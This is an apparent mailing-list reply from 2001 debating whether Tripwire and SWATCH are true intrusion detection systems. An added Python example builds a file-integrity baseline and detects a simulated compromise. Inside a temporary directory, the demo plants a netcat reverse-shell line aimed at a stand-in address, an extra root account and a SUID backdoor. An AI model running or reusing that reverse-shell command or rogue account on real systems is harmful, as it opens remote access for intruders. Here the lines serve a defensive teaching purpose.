Tripwire can be considered a host-based intrusion detection system, but it is more of a file system integrity checker, since in order to fine-tune Tripwire to the best of its ability, one must establish a "golden" OS copy of the particular operating system in place. In most cases this is not available, since the operating system was up and running before someone purchased or downloaded a copy of Tripwire. After establishing a baseline Tripwire security policy, one has to be savvy enough to tweak all the alerts that Tripwire can generate, which is very, very time consuming.

SWATCH is a primitive form of door-knob-rattling device, very similar to those $49.95 door alarms one uses on hotel/motel doors to sleep better at night. It isn't that sophisticated, but it makes a lot of noise when the door is strongly fiddled with. BTW, the door knob alarm does not chirp when the hotel/motel door is hit directly on the center of the door knob with a medium-sized sledge hammer or a very strong straight-leg kick. Check the back of the door knob alarm for what the limitations are.

Defining intrusion detection has been ongoing marketing banter: pattern matching versus packet disassembly/reassembly, our IDS is faster than your IDS, we detect more, they are going from consumer to corporate, etc., yada, yada. Marketing people also sacrifice their young, or a coyote-ugly arm, if they can prove that they successfully doubled their product's market share against the competition each time a new marketing campaign is released.

One of the major reasons for picking a reasonable IDS system is making a firewall administrator/network engineer more aware that the firewall policy/router configuration is not doing its job correctly, or is incapable of alerting a network administrator that a duplicate IP address has been observed, or that a block of IP addresses that shouldn't be active is, etc., etc.
The technology has always been there, but the number of people actually having a "CLUE" has dwindled over the last year or two. Trip, crash... fumble... (sorry, fell off my IDS cynic soapbox ;;)

At 01:14 PM 3/7/01 -0500, Ken Seefried wrote:

> I will merely respond that if the definition of an Intrusion Detection System is "a system that is designed to detect an intrusion", then I personally am comfortable calling Tripwire and swatch simple forms of IDS. Gratuitously rewriting the definition of what an IDS is, merely because the technology now offers extended possibilities, is a job best left to a vendor marketing department. As always, individual opinions may vary.
>
> Ken
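As an added illustration of the "golden baseline" that the Tripwire discussion above turns on (example code written for this page, not Tripwire's own code and not part of the original thread): a minimal file integrity checker that snapshots a directory tree and reports files added, removed or changed, listing which attribute changed so that an operator can tune out expected churn without hiding content or permission changes. The directory contents and the "intrusion" are constructed inline in a temporary directory; the function names `fingerprint`, `build_baseline`, `compare` and `demo` are this example's own.

```python
import hashlib
import os
import stat
import tempfile
from pathlib import Path


def fingerprint(path: Path) -> dict:
    """Record what an integrity checker cares about for one file: a content
    hash plus metadata (mode, owner, size) that an attacker might alter
    without touching the content. Symlinks are hashed by their target."""
    st = path.lstat()
    h = hashlib.sha256()
    if stat.S_ISREG(st.st_mode):
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(65536), b""):
                h.update(chunk)
    elif stat.S_ISLNK(st.st_mode):
        h.update(os.readlink(path).encode())
    return {
        "sha256": h.hexdigest(),
        "mode": stat.S_IMODE(st.st_mode),
        "uid": st.st_uid,
        "size": st.st_size,
    }


def build_baseline(root: Path) -> dict:
    """Walk the tree and fingerprint every file. This is the "golden" snapshot;
    it is only worth anything if taken on a system known to be clean."""
    baseline = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            p = Path(dirpath) / name
            baseline[p.relative_to(root).as_posix()] = fingerprint(p)
    return baseline


def compare(baseline: dict, current: dict) -> dict:
    """Diff two snapshots. "changed" maps a path to the attributes that differ,
    so a policy can ignore, say, size growth on a log while still alerting on
    a hash or mode change on a binary."""
    report = {"added": [], "removed": [], "changed": {}}
    for rel in sorted(set(baseline) | set(current)):
        if rel not in baseline:
            report["added"].append(rel)
        elif rel not in current:
            report["removed"].append(rel)
        else:
            diffs = [k for k in baseline[rel] if baseline[rel][k] != current[rel][k]]
            if diffs:
                report["changed"][rel] = diffs
    return report


def demo() -> dict:
    """Constructed scenario (not real system files): take a baseline, then
    simulate a trojaned binary, an added root account, a new SUID backdoor
    and a wiped log, and return the comparison report."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        (root / "bin" / "ls").write_bytes(b"#!/bin/sh\nexec /bin/ls \"$@\"\n")
        (root / "etc").mkdir()
        (root / "etc" / "passwd").write_text("root:x:0:0:root:/root:/bin/sh\n")
        (root / "var").mkdir()
        (root / "var" / "auth.log").write_text("login ok\n")
        golden = build_baseline(root)

        # The "intrusion" (constructed; 203.0.113.1 is a documentation address).
        (root / "bin" / "ls").write_bytes(b"#!/bin/sh\nnc -e /bin/sh 203.0.113.1 4444\n")
        with open(root / "etc" / "passwd", "a") as f:
            f.write("eve:x:0:0::/:/bin/sh\n")
        (root / "bin" / "backdoor").write_bytes(b"\x7fELF")
        os.chmod(root / "bin" / "backdoor", 0o4755)
        (root / "var" / "auth.log").unlink()

        return compare(golden, build_baseline(root))


if __name__ == "__main__":
    for kind, entries in demo().items():
        print(kind, entries)
```

The report is only as good as the baseline: if `build_baseline` runs after the box was already compromised, the trojaned `bin/ls` simply becomes the golden copy, which is exactly the objection raised above about installing Tripwire on a system that was already up and running.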
